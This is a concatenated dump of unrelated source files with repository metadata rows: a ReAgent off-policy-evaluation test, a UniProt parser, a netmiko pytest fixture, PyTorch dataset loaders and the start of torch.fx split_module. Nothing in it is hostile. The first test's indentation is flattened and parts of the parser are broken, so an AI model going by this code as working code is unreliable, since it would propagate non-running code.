model_rewards_for_logged_action=torch.tensor([]),
)
class TestOPEModuleAlgs(unittest.TestCase):
GAMMA = 0.9
CPE_PASS_BAR = 1.0
CPE_MAX_VALUE = 2.0
MAX_HORIZON = 1000
NOISE_EPSILON = 0.3
EPISODES = 2
def test_gridworld_sequential_adapter(self):
"""
Create a gridworld environment, logging policy, and target policy
Evaluates target policy using the direct OPE sequential doubly robust estimator,
then transforms the log into an evaluation data page which is passed to the ope adapter.
This test is meant to verify the adaptation of EDPs into RLEstimatorInputs as employed
by ReAgent since ReAgent provides EDPs to Evaluators. Going from EDP -> RLEstimatorInput
is more involved than RLEstimatorInput -> EDP since the EDP does not store the state
at each timestep in each MDP, only the corresponding logged outputs & model outputs.
Thus, the adapter must do some tricks to represent these timesteps as states so the
ope module can extract the correct outputs.
Note that there is some randomness in the model outputs since the model is purposefully
noisy. However, the same target policy is being evaluated on the same logged walks through
the gridworld, so the two results should be close in value (within 1).
"""
random.seed(0)
np.random.seed(0)
torch.random.manual_seed(0)
device = torch.device("cuda") if torch.cuda.is_available() else None
gridworld = GridWorld.from_grid(
[
["s", "0", "0", "0", "0"],
["0", "0", "0", "W", "0"],
["0", "0", "0", "0", "0"],
["0", "W", "0", "0", "0"],
["0", "0", "0", "0", "g"],
],
max_horizon=TestOPEModuleAlgs.MAX_HORIZON,
)
action_space = ActionSpace(4)
opt_policy = TabularPolicy(action_space)
trainer = DPTrainer(gridworld, opt_policy)
value_func = trainer.train(gamma=TestOPEModuleAlgs.GAMMA)
        behavior_policy = RandomRLPolicy(action_space)
target_policy = EpsilonGreedyRLPolicy(
opt_policy, TestOPEModuleAlgs.NOISE_EPSILON
)
model = NoiseGridWorldModel(
gridworld,
action_space,
epsilon=TestOPEModuleAlgs.NOISE_EPSILON,
max_horizon=TestOPEModuleAlgs.MAX_HORIZON,
)
value_func = DPValueFunction(target_policy, model, TestOPEModuleAlgs.GAMMA)
ground_truth = DPValueFunction(
target_policy, gridworld, TestOPEModuleAlgs.GAMMA
)
log = []
        log_generator = PolicyLogGenerator(gridworld, behavior_policy)
num_episodes = TestOPEModuleAlgs.EPISODES
for state in gridworld.states:
for _ in range(num_episodes):
log.append(log_generator.generate_log(state))
estimator_input = RLEstimatorInput(
gamma=TestOPEModuleAlgs.GAMMA,
log=log,
target_policy=target_policy,
value_function=value_func,
ground_truth=ground_truth,
)
edp = rlestimator_input_to_edp(estimator_input, len(model.action_space))
dr_estimator = SeqDREstimator(
weight_clamper=None, weighted=False, device=device
)
module_results = SequentialOPEstimatorAdapter.estimator_results_to_cpe_estimate(
dr_estimator.evaluate(estimator_input)
)
adapter_results = SequentialOPEstimatorAdapter(
dr_estimator, TestOPEModuleAlgs.GAMMA, device=device
).estimate(edp)
self.assertAlmostEqual(
adapter_results.raw,
module_results.raw,
delta=TestOPEModuleAlgs.CPE_PASS_BAR,
), f"OPE adapter results differed too much from underlying module (Diff: {abs(adapter_results.raw - module_results.raw)} > {TestOPEModuleAlgs.CPE_PASS_BAR})"
self.assertLess(
adapter_results.raw, TestOPEModuleAlgs.CPE_MAX_VALUE
), f"OPE adapter results are too large ({adapter_results.raw} > {TestOPEModuleAlgs.CPE_MAX_VALUE})"
def test_seq2slate_eval_data_page(self):
"""
Create 3 slate ranking logs and evaluate using Direct Method, Inverse
Propensity Scores, and Doubly Robust.
The logs are as follows:
state: [1, 0, 0], [0, 1, 0], [0, 0, 1]
indices in logged slates: [3, 2], [3, 2], [3, 2]
model output indices: [2, 3], [3, 2], [2, 3]
logged reward: 4, 5, 7
logged propensities: 0.2, 0.5, 0.4
predicted rewards on logged slates: 2, 4, 6
predicted rewards on model outputted slates: 1, 4, 5
predicted propensities: 0.4, 0.3, 0.7
When eval_greedy=True:
Direct Method uses the predicted rewards on model outputted slates.
Thus the result is expected to be (1 + 4 + 5) / 3
Inverse Propensity Scores would scale the reward by 1.0 / logged propensities
whenever the model output slate matches with the logged slate.
Since only the second log matches with the model output, the IPS result
is expected to be 5 / 0.5 / 3
Doubly Robust is the sum of the direct method result and propensity-scaled
reward difference; the latter is defined as:
1.0 / logged_propensities * (logged reward - predicted reward on logged slate)
* Indicator(model slate == logged slate)
Since only the second logged slate matches with the model outputted slate,
the DR result is expected to be (1 + 4 + 5) / 3 + 1.0 / 0.5 * (5 - 4) / 3
When eval_greedy=False:
Only Inverse Propensity Scores would be accurate. Because it would be too
expensive to compute all possible slates' propensities and predicted rewards
for Direct Method.
The expected IPS = (0.4 / 0.2 * 4 + 0.3 / 0.5 * 5 + 0.7 / 0.4 * 7) / 3
"""
batch_size = 3
state_dim = 3
src_seq_len = 2
tgt_seq_len = 2
candidate_dim = 2
reward_net = FakeSeq2SlateRewardNetwork()
seq2slate_net = FakeSeq2SlateTransformerNet()
src_seq = torch.eye(candidate_dim).repeat(batch_size, 1, 1)
tgt_out_idx = torch.LongTensor([[3, 2], [3, 2], [3, 2]])
tgt_out_seq = src_seq[
torch.arange(batch_size).repeat_interleave(tgt_seq_len),
tgt_out_idx.flatten() - 2,
].reshape(batch_size, tgt_seq_len, candidate_dim)
ptb = rlt.PreprocessedRankingInput(
state=rlt.FeatureData(float_features=torch.eye(state_dim)),
src_seq=rlt.FeatureData(float_features=src_seq),
tgt_out_seq=rlt.FeatureData(float_features=tgt_out_seq),
src_src_mask=torch.ones(batch_size, src_seq_len, src_seq_len),
tgt_out_idx=tgt_out_idx,
tgt_out_probs=torch.tensor([0.2, 0.5, 0.4]),
slate_reward=torch.tensor([4.0, 5.0, 7.0]),
extras=rlt.ExtraData(
sequence_number=torch.tensor([0, 0, 0]),
mdp_id=np.array(["0", "1", "2"]),
),
)
edp = EvaluationDataPage.create_from_tensors_seq2slate(
seq2slate_net, reward_net, ptb, eval_greedy=True
)
logger.info("---------- Start evaluating eval_greedy=True -----------------")
doubly_robust_estimator = OPEstimatorAdapter(DoublyRobustEstimator())
dm_estimator = OPEstimatorAdapter(DMEstimator())
ips_estimator = OPEstimatorAdapter(IPSEstimator())
switch_estimator = OPEstimatorAdapter(SwitchEstimator())
switch_dr_estimator = OPEstimatorAdapter(SwitchDREstimator())
doubly_robust = doubly_robust_estimator.estimate(edp)
inverse_propensity = ips_estimator.estimate(edp)
direct_method = dm_estimator.estimate(edp)
# Verify that Switch with low exponent is equivalent to IPS
switch_ips = switch_estimator.estimate(edp, exp_base=1)
# Verify that Switch with no candidates is equivalent to DM
switch_dm = switch_estimator.estimate(edp, candidates=0)
# Verify that SwitchDR with low exponent is equivalent to DR
switch_dr_dr = switch_dr_estimator.estimate(edp, exp_base=1)
# Verify that SwitchDR with no candidates is equivalent to DM
switch_dr_dm = switch_dr_estimator.estimate(edp, candidates=0)
logger.info(f"{direct_method}, {inverse_propensity}, {doubly_robust}")
avg_logged_reward = (4 + 5 + 7) / 3
self.assertAlmostEqual(direct_method.raw, (1 + 4 + 5) / 3, delta=1e-6)
self.assertAlmostEqual(
direct_method.normalized, direct_method.raw / avg_logged_reward, delta=1e-6
)
self.assertAlmostEqual(inverse_propensity.raw, 5 / 0.5 / 3, delta=1e-6)
self.assertAlmostEqual(
inverse_propensity.normalized,
inverse_propensity.raw / avg_logged_reward,
delta=1e-6,
)
self.assertAlmostEqual(
doubly_robust.raw, direct_method.raw + 1 / 0.5 * (5 - 4) / 3, delta=1e-6
)
self.assertAlmostEqual(
doubly_robust.normalized, doubly_robust.raw / avg_logged_reward, delta=1e-6
)
self.assertAlmostEqual(switch_ips.raw, inverse_propensity.raw, delta=1e-6)
self.assertAlmostEqual(switch_dm.raw, direct_method.raw, delta=1e-6)
self.assertAlmostEqual(switch_dr_dr.raw, doubly_robust.raw, delta=1e-6)
self.assertAlmostEqual(switch_dr_dm.raw, direct_method.raw, delta=1e-6)
logger.info("---------- Finish evaluating eval_greedy=True -----------------")
logger.info("---------- Start evaluating eval_greedy=False -----------------")
edp = EvaluationDataPage.create_from_tensors_seq2slate(
seq2slate_net, reward_net, ptb, eval_greedy=False
)
doubly_robust_estimator = OPEstimatorAdapter(DoublyRobustEstimator())
dm_estimator = OPEstimatorAdapter(DMEstimator())
ips_estimator = OPEstimatorAdapter(IPSEstimator())
doubly_robust = doubly_robust_estimator.estimate(edp)
inverse_propensity = ips_estimator.estimate(edp)
direct_method = dm_estimator.estimate(edp)
self.assertAlmostEqual(
inverse_propensity.raw,
(0.4 / 0.2 * 4 + 0.3 / 0.5 * 5 + 0.7 / 0.4 * 7) / 3,
delta=1e-6,
)
self.assertAlmostEqual(
inverse_propensity.normalized,
inverse_propensity.raw / avg_logged_reward,
delta=1e-6,
)
logger.info("---------- Finish evaluating eval_greedy=False -----------------")
| [
"[email protected]"
] | |
0be820d8c37117b65098b0e8dcdf0506cc8231b6 | 44064ed79f173ddca96174913910c1610992b7cb | /Second_Processing_app/temboo/Library/Twitter/DirectMessages/__init__.py | 1d26f95881809e14b918cc47d392e77b4e48342c | [] | no_license | dattasaurabh82/Final_thesis | 440fb5e29ebc28dd64fe59ecd87f01494ed6d4e5 | 8edaea62f5987db026adfffb6b52b59b119f6375 | refs/heads/master | 2021-01-20T22:25:48.999100 | 2014-10-14T18:58:00 | 2014-10-14T18:58:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 161 | py | from GetDirectMessages import *
from SendDirectMessage import *
from DestroyDirectMessage import *
from GetMessageByID import *
from DirectMessagesSent import *
| [
"[email protected]"
] | |
15cd6ea92f3995489a00742b8f8fe3837fe89534 | a2dcb0aa714a6f64748a633bb5399498bf369bda | /diana/toolbox/parse_uniprot.py | 71aa629076dd8494272a7c611678801cc399abbc | [
"MIT"
] | permissive | quimaguirre/diana | eefe1c8e571f3f2ac5486e0490a7f4bc886fefcb | 930da0ea91ad87e354061af18db6c437a3318366 | refs/heads/master | 2021-07-08T10:21:26.150879 | 2021-04-13T14:34:31 | 2021-04-13T14:34:31 | 95,761,183 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,091 | py | #########################################################################
# Uniprot XML parser to parse phosphorylation info of proteins
#
# eg 29/07/2009
#########################################################################
#from xml.etree.ElementTree import ElementTree
from xml.etree.ElementTree import iterparse
import TsvReader
def main():
file_name = "../data/disease/uniprot/humdisease.txt"
mim_to_mesh_values = get_mim_to_mesh(file_name)
    print len(mim_to_mesh_values)
    print mim_to_mesh_values["600807"]
return
from time import clock
parser = UniprotXMLParser("../data/Q12888.xml")
#parser = UniprotXMLParser("../../data/phosphorylation/uniprot/uniprot-phosphorylation-large-scale-analysis.xml")
#ids = parser.parse_ids()
#print map(len, ids)
#print ids[-1]
t1 = clock()
elements = parser.parse()
t2 = clock()
print len(elements), elements[-1]
print t2-t1
return
def get_uniprot_to_geneid(file_name, uniprot_ids=None, only_min=True, key_function=int):
"""
To parse HUMAN_9606_idmapping.dat file (trimmed to two columns) from Uniprot
only_min: Chooses the "min" defined by key_function used in min()
key_function: int (geneids) | len (gene symbols)
Creating the file
wget ftp://ftp.uniprot.org/pub/databases/uniprot/current_release/knowledgebase/idmapping/by_organism/HUMAN_9606_idmapping.dat.gz
zgrep Gene_Name HUMAN_9606_idmapping.dat.gz | cut -f 1,3 > uniprot_to_symbol.txt
zgrep GeneID HUMAN_9606_idmapping.dat.gz | cut -f 1,3 > idmapping.tab
OR zcat HUMAN_9606_idmapping_selected.dat.gz | cut -f 1,3 > idmapping.tab
"""
uniprot_to_geneids = {}
#geneid_to_uniprots = {}
f = open(file_name)
f.readline()
for line in f:
uniprot, geneid = line.split("\t")
geneid = geneid.strip()
uniprot = uniprot.strip()
if geneid == "" or uniprot == "":
continue
if uniprot_ids is not None and uniprot not in uniprot_ids:
continue
#if only_min:
# geneid = min(geneid.split("; "), key=key_function)
#uniprot_to_geneids[uniprot] = geneid
uniprot_to_geneids.setdefault(uniprot, set()).add(geneid)
f.close()
if only_min:
uniprot_to_geneid = {}
for uniprot, geneids in uniprot_to_geneids.iteritems():
uniprot_to_geneid[uniprot] = min(geneids, key=key_function)
uniprot_to_geneids = uniprot_to_geneid
return uniprot_to_geneids
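# Hedged usage sketch (file path and accession are placeholders; Python 2
# print syntax to match this module):
# mapping = get_uniprot_to_geneid("idmapping.tab", uniprot_ids=set(["P04637"]))
# print mapping  # e.g. {"P04637": "7157"}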
def get_uniprot_to_geneid_from_idmapping_file(file_name, uniprot_ids=None):
"""
To parse idmapping.tab from Uniprot
Useful for id mapping of non-human species
"""
parser = TsvReader.TsvReader(file_name, delim="\t", inner_delim=";")
column_to_index, id_to_values = parser.read(fields_to_include=["UniProtKB-AC", "GeneID (EntrezGene)"], keys_to_include=uniprot_ids, merge_inner_values=True)
uniprot_to_geneid = {}
for uniprot, values in id_to_values.iteritems():
for val in values:
geneid = val[column_to_index["geneid (entrezgene)"]]
#if uniprot in uniprot_to_geneid:
# print "multiple gene id", uniprot
#uniprot_to_geneid.setdefault(uniprot, set()).add(geneid)
uniprot_to_geneid[uniprot] = geneid
return uniprot_to_geneid
def get_mim_to_mesh(file_name):
"""
To parse humdisease.txt from Uniprot
"""
mim_to_mesh_values = {}
f = open(file_name)
line = f.readline()
while not line.startswith("ID"):
line = f.readline()
words = line.strip().split()
disease = " ".join(words[1:]).rstrip(".")
for line in f:
words = line.strip().split()
if words[0] == "ID":
disease = " ".join(words[1:]).rstrip(".")
if words[0] == "DR":
id_type = words[1].lower().rstrip(";")
if id_type == "mesh":
mesh = words[2].rstrip(".")
elif id_type == "mim":
mim = words[2].rstrip(";")
if line.startswith("//"):
#if mim in mim_to_mesh_values and mim_to_mesh_values[mim][1] == mesh:
#continue
#if mim in mim_to_mesh_values: print mim, mim_to_mesh_values[mim], disease, mesh
mim_to_mesh_values.setdefault(mim, []).append((disease, mesh))
f.close()
return mim_to_mesh_values
class UniprotXMLParser(object):
NS="{http://uniprot.org/uniprot}"
psiteDesc_to_psiteChar = { "Phosphoserine": "S",
"Phosphothreonine": "T",
"Phosphotyrosine": "Y",
"Phosphohistidine": "H" }
def __init__(self, filename):
self.file_name = filename
#self.etree = ElementTree()
return
def parse_ids_high_mem(self):
self.etree = ElementTree()
tree = self.etree.parse(self.file_name)
#ids = tree.findall(self.NS+"accession")
ids = []
sub_ids = None
for e in tree.getiterator():
if e.tag == self.NS+"entry":
if sub_ids is not None:
ids.append(sub_ids)
sub_ids = []
if e.tag == self.NS+"accession":
sub_ids.append(e.text)
ids.append(sub_ids)
return ids
def parse_ids(self):
ids = []
sub_ids = []
# get an iterable
context = iterparse(self.file_name, ["start", "end"])
# turn it into an iterator
context = iter(context)
# get the root element
event, root = context.next()
for (event, elem) in context:
if event == "end":
if elem.tag == self.NS+"accession":
sub_ids.append(elem.text)
if elem.tag == self.NS+"entry":
ids.append(sub_ids)
sub_ids = []
elem.clear()
root.clear()
return ids
def parse(self):
ignored_modification_types = set()
context = iterparse(self.file_name, ["start", "end"])
context = iter(context)
event, root = context.next()
elements = []
current_element = None
current_position = None
for (event, elem) in context:
if event == "start":
if elem.tag == self.NS+"entry":
current_element = UniprotXMLElement()
elif event == "end":
if elem.tag == self.NS+"accession":
current_element.add_id(elem.text)
elif elem.tag == self.NS+"organism":
db_elm = elem.find(self.NS+"dbReference") #only looks at sublevel - alternative: keep tag stack
if db_elm.get("type") == "NCBI Taxonomy":
current_element.set_tax(db_elm.get("id"))
elif elem.tag == self.NS+"feature" and elem.get("type") == "modified residue":
#print elem.getchildren()
#pos_elm = elem.find(self.NS+"position")
#if elem.get("status") == "probable":
# continue
for sub_elm in elem.getiterator():
if sub_elm.tag == self.NS+"position":
pos_elm = sub_elm
pos = pos_elm.get("position")
desc = elem.get("description")
vals = desc.split(";")
type = vals[0]
kinase = vals[1][vals[1].find("by")+2:].strip() if (len(vals) > 1) else None
if self.psiteDesc_to_psiteChar.has_key(type):
type = self.psiteDesc_to_psiteChar[type]
current_element.add_psite(pos, type, kinase)
else:
ignored_modification_types.add(type)
elif elem.tag == self.NS+"entry":
seq_elm = elem.find(self.NS+"sequence")
current_element.set_sequence(seq_elm.text)
elements.append(current_element)
elem.clear()
root.clear()
print "Ignored mofications: ", ignored_modification_types
return elements
class UniprotXMLElement(object):
def __init__(self):
self.ids = []
self.taxid = None
self.phosphosites = []
self.sequence = None
def add_id(self, id):
self.ids.append(id)
def set_tax(self, taxid):
self.taxid = taxid
def add_psite(self, pos, type=None, kinase=None):
self.phosphosites.append( (pos, type, kinase) )
def set_sequence(self, seq):
self.sequence = seq.replace("\n","")
def get_ids(self):
return self.ids
def get_tax(self):
return self.taxid
def get_psites(self):
return self.phosphosites
def get_sequence(self):
return self.sequence
def __repr__(self):
return "%s\t%s\t%s\t%s" % (self.ids, self.taxid, self.phosphosites, self.sequence)
if __name__ == "__main__":
main()
| [
"[email protected]"
] | |
8c28b115446dbdfb81f139fe921de4b0f92fdd98 | 2233f520493f64c6070dd3e77722e53a7dd738e8 | /unittest_example/test_fixture.py | 372b4c964d16e91c4d8e53f9fd56d8ddf350e948 | [
"Apache-2.0"
] | permissive | mpjeffin/pynet-ons-oct17 | 690bb31600b8ef5131439bb25ddce35b4855ba6a | d0daf9c250f79bc34b3b8b06b67004f56ef834a2 | refs/heads/master | 2021-09-07T00:00:02.234456 | 2018-02-13T19:58:11 | 2018-02-13T19:58:11 | 125,467,721 | 1 | 0 | null | 2018-03-16T05:26:10 | 2018-03-16T05:26:10 | null | UTF-8 | Python | false | false | 621 | py | import pytest
from getpass import getpass
from netmiko import ConnectHandler
# Fixtures
@pytest.fixture(scope="module")
def netmiko_connect():
cisco1 = {
'device_type': 'cisco_ios',
'ip': '184.105.247.70',
'username': 'pyclass',
'password': getpass()
}
return ConnectHandler(**cisco1)
def test_prompt(netmiko_connect):
print(netmiko_connect.find_prompt())
assert netmiko_connect.find_prompt() == 'pynet-rtr1#'
def test_show_version(netmiko_connect):
output = netmiko_connect.send_command("show version")
assert 'Configuration register is 0x2102' in output
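# Note (not in the original): the netmiko_connect fixture prompts for a
# password via getpass, so run pytest with output capture disabled:
#   pytest -s test_fixture.py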
| [
"[email protected]"
] | |
552df7ba2d2c6009f8e016dca6ec864e0e9526d7 | 4c7c8ba4f90e59b5cfdf290a8613c895becd847a | /src/datasets.py | b49b76551de0bca116aeb57121d8117508b6a102 | [] | no_license | stalhabukhari/sls | 00d4f73650d2745cc74aafb5ddcb0af8ae9498de | 98b215212571b545019dd9b199715a9193ec8cfd | refs/heads/master | 2020-12-03T11:15:48.523101 | 2019-12-22T21:45:02 | 2019-12-22T21:45:02 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,737 | py | import torchvision
from sklearn.model_selection import train_test_split
from torchvision import transforms
import torch
from sklearn import metrics
from src import utils as ut
def get_dataset(dataset_name, train_flag, datadir, exp_dict):
if dataset_name == "mnist":
dataset = torchvision.datasets.MNIST(datadir, train=train_flag,
download=True,
transform=torchvision.transforms.Compose([
torchvision.transforms.ToTensor(),
torchvision.transforms.Normalize(
(0.5,), (0.5,))
]))
if dataset_name == "cifar10":
transform_function = transforms.Compose([
transforms.RandomCrop(32, padding=4),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize((0.4914, 0.4822, 0.4465),
(0.2023, 0.1994, 0.2010)),
])
dataset = torchvision.datasets.CIFAR10(
root=datadir,
train=train_flag,
download=True,
transform=transform_function)
if dataset_name == "cifar100":
transform_function = transforms.Compose([
transforms.RandomCrop(32, padding=4),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize((0.4914, 0.4822, 0.4465),
(0.2023, 0.1994, 0.2010)),
])
dataset = torchvision.datasets.CIFAR100(
root=datadir,
train=train_flag,
download=True,
transform=transform_function)
if dataset_name in ["mushrooms", "w8a",
"rcv1", "ijcnn"]:
sigma_dict = {"mushrooms": 0.5,
"w8a":20.0,
"rcv1":0.25 ,
"ijcnn":0.05}
X, y = load_libsvm(dataset_name, data_dir=datadir)
labels = np.unique(y)
y[y==labels[0]] = 0
y[y==labels[1]] = 1
# TODO: (amishkin) splits = train_test_split(X, y, test_size=0.2, shuffle=True, random_state=9513451)
splits = train_test_split(X, y, test_size=0.2, shuffle=False, random_state=42)
X_train, X_test, Y_train, Y_test = splits
if train_flag:
# fname_rbf = "%s/rbf_%s_train.pkl" % (datadir, dataset_name)
# if os.path.exists(fname_rbf):
# k_train_X = ut.load_pkl(fname_rbf)
# else:
k_train_X = rbf_kernel(X_train, X_train, sigma_dict[dataset_name])
# ut.save_pkl(fname_rbf, k_train_X)
X_train = k_train_X
X_train = torch.FloatTensor(X_train)
Y_train = torch.FloatTensor(Y_train)
dataset = torch.utils.data.TensorDataset(X_train, Y_train)
else:
# fname_rbf = "%s/rbf_%s_test.pkl" % (datadir, dataset_name)
# if os.path.exists(fname_rbf):
# k_test_X = ut.load_pkl(fname_rbf)
# else:
k_test_X = rbf_kernel(X_test, X_train, sigma_dict[dataset_name])
# ut.save_pkl(fname_rbf, k_test_X)
X_test = k_test_X
X_test = torch.FloatTensor(X_test)
Y_test = torch.FloatTensor(Y_test)
dataset = torch.utils.data.TensorDataset(X_test, Y_test)
return dataset
if dataset_name == "synthetic":
margin = exp_dict["margin"]
X, y, _, _ = make_binary_linear(n=exp_dict["n_samples"],
d=exp_dict["d"],
margin=margin,
y01=True,
bias=True,
separable=True,
seed=42)
# No shuffling to keep the support vectors inside the training set
splits = train_test_split(X, y, test_size=0.2, shuffle=False, random_state=42)
X_train, X_test, Y_train, Y_test = splits
X_train = torch.FloatTensor(X_train)
X_test = torch.FloatTensor(X_test)
Y_train = torch.FloatTensor(Y_train)
Y_test = torch.FloatTensor(Y_test)
if train_flag:
dataset = torch.utils.data.TensorDataset(X_train, Y_train)
else:
dataset = torch.utils.data.TensorDataset(X_test, Y_test)
return dataset
if dataset_name == "matrix_fac":
fname = datadir + 'matrix_fac.pkl'
if not os.path.exists(fname):
data = generate_synthetic_matrix_factorization_data()
ut.save_pkl(fname, data)
A, y = ut.load_pkl(fname)
X_train, X_test, y_train, y_test = train_test_split(A, y, test_size=0.2, random_state=9513451)
training_set = torch.utils.data.TensorDataset(torch.tensor(X_train, dtype=torch.float), torch.tensor(y_train, dtype=torch.float))
test_set = torch.utils.data.TensorDataset(torch.tensor(X_test, dtype=torch.float), torch.tensor(y_test, dtype=torch.float))
if train_flag:
dataset = training_set
else:
dataset = test_set
return dataset
# ===========================================================
# matrix factorization
def generate_synthetic_matrix_factorization_data(xdim=6, ydim=10, nsamples=1000, A_condition_number=1e-10):
"""
Generate a synthetic matrix factorization dataset as suggested by Ben Recht.
See: https://github.com/benjamin-recht/shallow-linear-net/blob/master/TwoLayerLinearNets.ipynb.
"""
Atrue = np.linspace(1, A_condition_number, ydim
).reshape(-1, 1) * np.random.rand(ydim, xdim)
# the inputs
X = np.random.randn(xdim, nsamples)
# the y's to fit
Ytrue = Atrue.dot(X)
data = (X.T, Ytrue.T)
return data
# ===========================================================
# Helpers
import os
import urllib
import numpy as np
from sklearn.svm import SVC
from sklearn.datasets import load_svmlight_file
from torchvision.datasets import MNIST
LIBSVM_URL = "https://www.csie.ntu.edu.tw/~cjlin/libsvmtools/datasets/binary/"
LIBSVM_DOWNLOAD_FN = {"rcv1" : "rcv1_train.binary.bz2",
"mushrooms" : "mushrooms",
"ijcnn" : "ijcnn1.tr.bz2",
"w8a" : "w8a"}
def load_mnist(data_dir):
dataset = MNIST(data_dir, train=True, transform=None,
target_transform=None, download=True)
X, y = dataset.data.numpy(), dataset.targets.numpy()
X = X / 255.
X = X.reshape((X.shape[0], -1))
return X, y
def load_libsvm(name, data_dir):
if not os.path.exists(data_dir):
os.mkdir(data_dir)
fn = LIBSVM_DOWNLOAD_FN[name]
data_path = os.path.join(data_dir, fn)
if not os.path.exists(data_path):
url = urllib.parse.urljoin(LIBSVM_URL, fn)
print("Downloading from %s" % url)
urllib.request.urlretrieve(url, data_path)
print("Download complete.")
X, y = load_svmlight_file(data_path)
return X, y
def make_binary_linear(n, d, margin, y01=False, bias=False, separable=True, shuffle=True, seed=None):
assert margin >= 0.
if seed:
np.random.seed(seed)
labels = [-1, 1]
# Generate support vectors that are 2 margins away from each other
# that is also linearly separable by a homogeneous separator
w = np.random.randn(d); w /= np.linalg.norm(w)
# Now we have the normal vector of the separating hyperplane, generate
# a random point on this plane, which should be orthogonal to w
p = np.random.randn(d-1); l = (-p@w[:d-1])/w[-1]
p = np.append(p, [l])
# Now we take p as the starting point and move along the direction of w
# by m and -m to obtain our support vectors
v0 = p - margin*w
v1 = p + margin*w
yv = np.copy(labels)
# Start generating points with rejection sampling
X = []; y = []
for i in range(n-2):
label = np.random.choice(labels)
# Generate a random point with mean at the center with variance
# adapted to the margin
xi = np.sqrt(margin)*np.random.randn(d)
dist = xi@w
while dist*label <= margin:
u = v0-v1 if label == -1 else v1-v0
u /= np.linalg.norm(u)
xi = xi + np.sqrt(margin)*u
dist = xi@w
X.append(xi)
y.append(label)
X = np.array(X).astype(float); y = np.array(y).astype(float)
if shuffle:
ind = np.random.permutation(n-2)
X = X[ind]; y = y[ind]
# Put the support vectors at the beginning
X = np.r_[np.array([v0, v1]), X]
y = np.r_[np.array(yv), y]
if separable:
# Assert linear separability
# Since we're supposed to interpolate, we should not regularize.
clff = SVC(kernel="linear", gamma="auto", tol=1e-10, C=1e10)
clff.fit(X, y)
assert clff.score(X, y) == 1.0
# Assert margin obtained is what we asked for
w = clff.coef_.flatten()
sv_margin = np.min(np.abs(clff.decision_function(X)/np.linalg.norm(w)))
assert np.abs(sv_margin - margin) < 1e-4
else:
flip_ind = np.random.choice(n, int(n*0.01))
y[flip_ind] = -y[flip_ind]
if y01:
y[y==-1] = 0
if bias:
# TODO: Get rid of this later, bias should be handled internally,
# this is just for ease of implementation for the Hessian
X = np.c_[np.ones(n), X]
return X, y, w, (v0, v1)
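# Helper below computes the Gaussian (RBF) kernel matrix,
# K[i, j] = exp(-||A_i - B_j||^2 / (2 * sigma^2)),
# used above to kernelize the libsvm datasets before fitting.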
def rbf_kernel(A, B, sigma):
distsq = np.square(metrics.pairwise.pairwise_distances(A, B, metric="euclidean"))
K = np.exp(-1 * distsq/(2*sigma**2))
return K | [
"[email protected]"
] | |
3d25ee146a7fe4d18336d7409cdf3a5289423d1f | d554b1aa8b70fddf81da8988b4aaa43788fede88 | /5 - Notebooks e Data/1 - Análises numéricas/Arquivos David/Atualizados/logDicas-master/data/2019-1/225/users/4005/codes/1712_2496.py | 3442b9c6e33cbbf122e05bddd7a511c8d9ce8261 | [] | no_license | JosephLevinthal/Research-projects | a3bc3ca3b09faad16f5cce5949a2279cf14742ba | 60d5fd6eb864a5181f4321e7a992812f3c2139f9 | refs/heads/master | 2022-07-31T06:43:02.686109 | 2020-05-23T00:24:26 | 2020-05-23T00:24:26 | 266,199,309 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 118 | py | num = int(input("Digite um numero: "))
c=0
while(num!=-1):
c= c+ num
num = int(input("Digite um numero: "))
print(c) | [
"[email protected]"
] | |
5e57b310c8982173953ff99d06116aa3e3553169 | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/5/usersdata/67/2931/submittedfiles/atm.py | a41e9c31c6bb1ca25bc098784953451c866f8b20 | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 219 | py | # -*- coding: utf-8 -*-
from __future__ import division
import math
#COMECE SEU CODIGO AQUI
a=input("Digite o valor:")
c20=a/20
c10=a%20/10
c5=(a%20%10)/5
b=int(c20)
c=int(c10)
d=int(c5)
print(b)
print(c)
print(d)
| [
"[email protected]"
] | |
c6a42a74e17de8f8fa6f756dfce650e95093fe04 | add16900a969741c9e7570d3b7b47b76e22ccd04 | /torch/fx/passes/split_module.py | 238f2a947c0b27b869d8ab6cd6c25f031af3f8a0 | [
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla",
"BSL-1.0",
"Apache-2.0",
"BSD-2-Clause"
] | permissive | talemache/pytorch | 55143c60b927a73f6392f7dde1f4fc8ef7ee76e6 | a4da326621418dcccba50d2e827e6644e7f03ed1 | refs/heads/master | 2023-05-09T06:02:30.990411 | 2021-05-30T04:37:41 | 2021-05-30T04:37:41 | 318,314,852 | 2 | 0 | NOASSERTION | 2021-05-30T04:37:41 | 2020-12-03T20:43:29 | null | UTF-8 | Python | false | false | 9,016 | py | import torch
from torch.fx.graph_module import GraphModule
from typing import Callable, List, Dict, Any, Optional
class Partition:
def __init__(self, name: str):
self.name: str = name
self.node_names: List[str] = []
self.inputs: Dict[str, None] = {}
self.outputs: Dict[str, None] = {}
self.partitions_dependent_on: Dict[str, None] = {}
self.partition_dependents: Dict[str, None] = {}
self.graph : torch.fx.graph.Graph = torch.fx.graph.Graph() # type: ignore[attr-defined, name-defined]
self.environment : Dict[torch.fx.node.Node, torch.fx.node.Node] = {} # type: ignore[name-defined]
self.targets : Dict[str, Any] = {}
def __repr__(self) -> str:
return f"name: {self.name},\n" \
f" nodes: {self.node_names},\n" \
f" inputs: {self.inputs},\n" \
f" outputs: {self.outputs},\n" \
f" partitions depenent on: {self.partitions_dependent_on},\n" \
f" parition dependents: {self.partition_dependents}"
# Creates subgraphs out of main graph
def split_module(
m: GraphModule,
root_m: torch.nn.Module,
split_callback: Callable[[torch.fx.node.Node], int], # type: ignore[name-defined]
):
partitions: Dict[str, Partition] = {}
orig_nodes: Dict[str, torch.fx.node.Node] = {} # type: ignore[name-defined]
def record_cross_partition_use(def_node : torch.fx.node.Node, use_node : Optional[torch.fx.node.Node]): # type: ignore[name-defined] # noqa: B950
